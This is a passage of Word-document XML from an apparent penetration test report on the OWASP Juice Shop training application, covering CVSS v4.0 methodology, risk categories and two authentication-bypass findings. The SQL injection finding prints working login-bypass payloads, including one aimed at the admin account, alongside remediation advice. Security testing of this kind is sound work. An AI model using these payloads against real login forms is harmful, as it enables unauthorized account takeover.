      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attackers inject malicious commands (e.g., SQL or shell code) through input fields that the system erroneously executes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fundamental architectural flaws that exist before implementation make an application inherently insecure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Flaws in identity verification allow attackers to take over sessions or guess passwords (brute force).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software or Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lack of verification of code or data sources leads to acceptance of untrusted updates or serialization data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Logging &amp; Alerting Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attacks go undetected or responses are delayed due to missing logs or absent alert notifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mishandling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Programs respond inadequately to unforeseen situations, which can lead to crashes or logic errors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="events"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the test, the following restrictions or events occurred that may have affected the scope or depth of the assessment:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="20" w:name="risk-assessment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="17" w:name="cvss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The risk assessment of the vulnerabilities found is performed using the industry standard Common Vulnerability Scoring System v4.0 (hereinafter referred to as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“CVSS”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). This is a standard that can be used to uniformly assess the vulnerability of computer systems and the severity of security vulnerabilities. This makes it possible to compare vulnerabilities more effectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Common Vulnerability Scoring System has a metric structure and is based on values that are divided into four groups:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Base”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Threat”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Environmental”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Supplemental”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. To determine the vulnerability scores, each group has its own rules. The values of the Base group are invariant in time and remain the same in different environments. In the Threat group, the time dependency of a vulnerability is taken into account. For example, the vulnerability of a system to a particular vulnerability decreases over time as more and more countermeasures such as patches become known and available. The Environmental group incorporates various criteria of the specific IT environments into the vulnerability rating. The Supplemental group provides additional context that does not modify the final score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The CVSS ratings are numerical values on a scale of 0.0 to 10.0, with the highest vulnerability of a system occurring at a value of 10.0. Our rating is based on the CVSS-B (Base Score) and is composed of:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Vector (AV)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Complexity (AC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Requirements (AT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Privileges Required (PR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User Interaction (UI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerable System Impact: Confidentiality (VC), Integrity (VI), Availability (VA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subsequent System Impact: Confidentiality (SC), Integrity (SI), Availability (SA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As penetration testers, we can only assess the general threats posed by a vulnerability (CVSS-B). However, we have no insight into the internal structures of our clients. Therefore, the assessment of the specific risks for the client’s systems and business processes must be done by the client. For this purpose, CVSS offers the Environmental metrics (CVSS-BE). This makes it possible to subsequently adjust the CVSS score of vulnerabilities after the test result has been submitted before they are remedied. This changes the assessment of the risk and thus the urgency of remediation of a vulnerability. For more information, see</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CVSS v4.0 Specification</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="risk-categories"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risk Categories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The risk categories used in this report reflect the recommended priority for addressing the vulnerabilities identified during the penetration test. The categorization is based on the probability of exploitation and the significance of the impact. The risk value is calculated using the CVSS v4.0 standard:</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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Category Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critical vulnerabilities that allow an attacker to gain full access to the object under test and its sensitive information. It is possible to cause enormous damage to the client’s reputation. Furthermore, these vulnerabilities may allow attackers to gain wide-ranging privileges, including to other systems or applications of the client that have not been investigated in detail within the scope of this project. Exploitation of the vulnerabilities is not prevented and can be reproduced with medium to low effort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vulnerabilities that may allow an attacker to manipulate sensitive data, damage the client’s reputation, gain unauthorized access to sensitive information, or gain unauthorized access to applications or the client’s infrastructure. The vulnerabilities are reproducible with medium to high effort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vulnerabilities that may allow an attacker to harm the client’s reputation or gain unauthorized access to client data. The privileges that an attacker can gain by exploiting the vulnerabilities are limited.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security vulnerabilities that do not pose a threat in themselves, but which, for example, provide attackers with useful information about the network and systems. These vulnerabilities allow an attacker only very limited access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Anomalies such as functional limitations or inconsistencies. These do not currently represent a risk and have no negative impact on the test object. Accordingly, no action is required. Nevertheless, countermeasures can be helpful for the functional and safety improvement of the test object. If necessary, this may give rise to risks under other circumstances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="vulnerability-states"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability States</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerabilities can be in one of the following states:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Active</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The vulnerability has been identified and it has been possible to verify its existence through exploitation or direct evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Potential</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The vulnerability has been identified but its exploitation has not been possible, so its existence cannot be fully verified, and it is up to the client to determine the impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fixed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The vulnerability has been remediated and verified through retesting.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="summary-of-findings"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1092"/>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="2048"/>
        <w:gridCol w:w="1775"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS v4 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injection in Login Form - Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JWT Algorithm</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">‘none’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Acceptance - Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="27" w:name="findings-and-remediation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Findings and Remediation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="finding"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="X097427858616d9eea6a4fdd2e50d10b6c12e336"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection in Login Form - Authentication Bypass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login form at /#/login is vulnerable to SQL injection via the email field. An attacker can bypass authentication and gain unauthorized access to any user account, including administrative accounts, by injecting SQL payloads into the email field. The vulnerability exists because user input is directly concatenated into SQL queries without proper parameterization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successful authentication bypass demonstrated with two payloads:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generic Bypass: Email: ’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– | Password: password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Admin Takeover: Email: admin@juice-sh.op’– | Password: password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Both payloads successfully logged in and redirected to /#/search, proving complete authentication bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries (prepared statements) for all database queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement input validation on the email field</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply least privilege to database connections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider using an ORM with proper escaping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable SQL injection detection in WAF</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="26" w:name="finding-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="X2aa958a13cb1c6253855f1a8f170ec5c08966c1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT Algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Acceptance - Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="5940"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Base Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">9.8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId22">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The OWASP Juice Shop application accepts JWT tokens signed with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">algorithm, allowing complete authentication bypass and privilege escalation.</w:t>
